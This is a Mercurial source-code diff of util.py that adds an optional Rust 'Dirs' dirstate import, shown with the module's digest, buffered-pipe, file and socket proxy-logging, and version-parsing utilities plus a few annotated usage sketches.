rust-dirstate: call new "dirs" rust implementation from Python...
Raphaël Gomès
r42738:f5ef8c85 default draft
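
The only change to util.py in this revision is the pair of added lines marked
with "+" in the listing below: policy.importrust('dirstate', 'Dirs') probes
the optional Rust extension and returns the requested attribute, here the
"Dirs" multiset of directory names used by the dirstate, or None when the
Rust module is unavailable or disabled by the module policy. Call sites are
therefore expected to keep a pure-Python fallback. A minimal sketch of that
pattern, assuming a hypothetical pure-Python stand-in passed in as pydirs:

    from mercurial import util

    def pickdirsclass(pydirs):
        # util.rustdirs is None unless the Rust extension was importable,
        # so fall back to the pure-Python implementation in that case.
        return util.rustdirs if util.rustdirs is not None else pydirs
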
@@ -1,3318 +1,3323 @@
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings

from .thirdparty import (
    attr,
)
from hgdemandimport import tracing
from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    compression,
    procutil,
    stringutil,
)

+rustdirs = policy.importrust('dirstate', 'Dirs')
+
base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
readlink = platform.readlink
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

# small compat layer
compengines = compression.compengines
SERVERROLE = compression.SERVERROLE
CLIENTROLE = compression.CLIENTROLE

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

# python 2.6 still has deprecation warnings enabled by default. We do not want
# to display anything to standard users, so detect if we are running tests and
# only use python deprecation warnings in this case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))

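# ---------------------------------------------------------------------------
# Illustrative sketch (not from the original source): a digestchecker is
# typically driven by wrapping a file handle, reading it to exhaustion, and
# then calling validate(), which aborts on a size or digest mismatch. The md5
# value below is the digest of b'foo', matching the digester doctest above:
#
#     import io
#     fh = digestchecker(io.BytesIO(b'foo'), 3,
#                        {b'md5': b'acbd18db4cc2f85cedef654fccc4a4d8'})
#     while fh.read(4096):
#         pass
#     fh.validate()  # raises error.Abort on mismatch
# ---------------------------------------------------------------------------
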
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if len(self._buffer) > 1:
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

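# ---------------------------------------------------------------------------
# Illustrative sketch (not from the original source): bufferedinputpipe is
# meant to wrap the read end of a pipe so hasbuffer can be consulted before
# polling, since select() cannot see data already sitting in a buffer:
#
#     import os, select
#     rfd, wfd = os.pipe()
#     os.write(wfd, b'a line\nmore')
#     pipe = bufferedinputpipe(os.fdopen(rfd, r'rb'))
#     pipe.readline()          # -> b'a line\n'; b'more' stays buffered
#     if not pipe.hasbuffer:   # only poll when our buffer is empty
#         select.select([pipe.fileno()], [], [])
# ---------------------------------------------------------------------------
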
def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

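# ---------------------------------------------------------------------------
# Illustrative sketch (not from the original source): mmapread accepts either
# a file object or a raw descriptor (hence the fileno() probe), and the
# ValueError branch makes zero-length files behave like an empty read:
#
#     with open(somepath, r'rb') as fp:   # somepath is a placeholder
#         data = mmapread(fp)             # mmap object, or '' for empty file
#         nbytes = len(data)              # mmaps support len() and slicing
# ---------------------------------------------------------------------------
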
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed is a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)

class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if size == -1 and res == '':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''

        # _writedata() uses "in" operator and is confused by memoryview because
        # characters are ints on Python 3.
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

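# ---------------------------------------------------------------------------
# Illustrative sketch (not from the original source): the proxy/observer
# machinery above is test-only plumbing; every observed call is echoed to a
# log handle. For example:
#
#     import io
#     logh = io.BytesIO()
#     fh = makeloggingfileobject(logh, io.BytesIO(b'data'), b'src',
#                                logdata=True)
#     fh.read(2)
#     # logh now holds something like: src> read(2) -> 2: da
# ---------------------------------------------------------------------------
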
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, len(res)))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

979 def version():
981 def version():
980 """Return version information if available."""
982 """Return version information if available."""
981 try:
983 try:
982 from . import __version__
984 from . import __version__
983 return __version__.version
985 return __version__.version
984 except ImportError:
986 except ImportError:
985 return 'unknown'
987 return 'unknown'
986
988
987 def versiontuple(v=None, n=4):
989 def versiontuple(v=None, n=4):
988 """Parses a Mercurial version string into an N-tuple.
990 """Parses a Mercurial version string into an N-tuple.
989
991
990 The version string to be parsed is specified with the ``v`` argument.
992 The version string to be parsed is specified with the ``v`` argument.
991 If it isn't defined, the current Mercurial version string will be parsed.
993 If it isn't defined, the current Mercurial version string will be parsed.
992
994
993 ``n`` can be 2, 3, or 4. Here is how some version strings map to
995 ``n`` can be 2, 3, or 4. Here is how some version strings map to
994 returned values:
996 returned values:
995
997
996 >>> v = b'3.6.1+190-df9b73d2d444'
998 >>> v = b'3.6.1+190-df9b73d2d444'
997 >>> versiontuple(v, 2)
999 >>> versiontuple(v, 2)
998 (3, 6)
1000 (3, 6)
999 >>> versiontuple(v, 3)
1001 >>> versiontuple(v, 3)
1000 (3, 6, 1)
1002 (3, 6, 1)
1001 >>> versiontuple(v, 4)
1003 >>> versiontuple(v, 4)
1002 (3, 6, 1, '190-df9b73d2d444')
1004 (3, 6, 1, '190-df9b73d2d444')
1003
1005
1004 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1006 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1005 (3, 6, 1, '190-df9b73d2d444+20151118')
1007 (3, 6, 1, '190-df9b73d2d444+20151118')
1006
1008
1007 >>> v = b'3.6'
1009 >>> v = b'3.6'
1008 >>> versiontuple(v, 2)
1010 >>> versiontuple(v, 2)
1009 (3, 6)
1011 (3, 6)
1010 >>> versiontuple(v, 3)
1012 >>> versiontuple(v, 3)
1011 (3, 6, None)
1013 (3, 6, None)
1012 >>> versiontuple(v, 4)
1014 >>> versiontuple(v, 4)
1013 (3, 6, None, None)
1015 (3, 6, None, None)
1014
1016
1015 >>> v = b'3.9-rc'
1017 >>> v = b'3.9-rc'
1016 >>> versiontuple(v, 2)
1018 >>> versiontuple(v, 2)
1017 (3, 9)
1019 (3, 9)
1018 >>> versiontuple(v, 3)
1020 >>> versiontuple(v, 3)
1019 (3, 9, None)
1021 (3, 9, None)
1020 >>> versiontuple(v, 4)
1022 >>> versiontuple(v, 4)
1021 (3, 9, None, 'rc')
1023 (3, 9, None, 'rc')
1022
1024
1023 >>> v = b'3.9-rc+2-02a8fea4289b'
1025 >>> v = b'3.9-rc+2-02a8fea4289b'
1024 >>> versiontuple(v, 2)
1026 >>> versiontuple(v, 2)
1025 (3, 9)
1027 (3, 9)
1026 >>> versiontuple(v, 3)
1028 >>> versiontuple(v, 3)
1027 (3, 9, None)
1029 (3, 9, None)
1028 >>> versiontuple(v, 4)
1030 >>> versiontuple(v, 4)
1029 (3, 9, None, 'rc+2-02a8fea4289b')
1031 (3, 9, None, 'rc+2-02a8fea4289b')
1030
1032
1031 >>> versiontuple(b'4.6rc0')
1033 >>> versiontuple(b'4.6rc0')
1032 (4, 6, None, 'rc0')
1034 (4, 6, None, 'rc0')
1033 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1035 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1034 (4, 6, None, 'rc0+12-425d55e54f98')
1036 (4, 6, None, 'rc0+12-425d55e54f98')
1035 >>> versiontuple(b'.1.2.3')
1037 >>> versiontuple(b'.1.2.3')
1036 (None, None, None, '.1.2.3')
1038 (None, None, None, '.1.2.3')
1037 >>> versiontuple(b'12.34..5')
1039 >>> versiontuple(b'12.34..5')
1038 (12, 34, None, '..5')
1040 (12, 34, None, '..5')
1039 >>> versiontuple(b'1.2.3.4.5.6')
1041 >>> versiontuple(b'1.2.3.4.5.6')
1040 (1, 2, 3, '.4.5.6')
1042 (1, 2, 3, '.4.5.6')
1041 """
1043 """
1042 if not v:
1044 if not v:
1043 v = version()
1045 v = version()
1044 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1046 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1045 if not m:
1047 if not m:
1046 vparts, extra = '', v
1048 vparts, extra = '', v
1047 elif m.group(2):
1049 elif m.group(2):
1048 vparts, extra = m.groups()
1050 vparts, extra = m.groups()
1049 else:
1051 else:
1050 vparts, extra = m.group(1), None
1052 vparts, extra = m.group(1), None
1051
1053
1052 vints = []
1054 vints = []
1053 for i in vparts.split('.'):
1055 for i in vparts.split('.'):
1054 try:
1056 try:
1055 vints.append(int(i))
1057 vints.append(int(i))
1056 except ValueError:
1058 except ValueError:
1057 break
1059 break
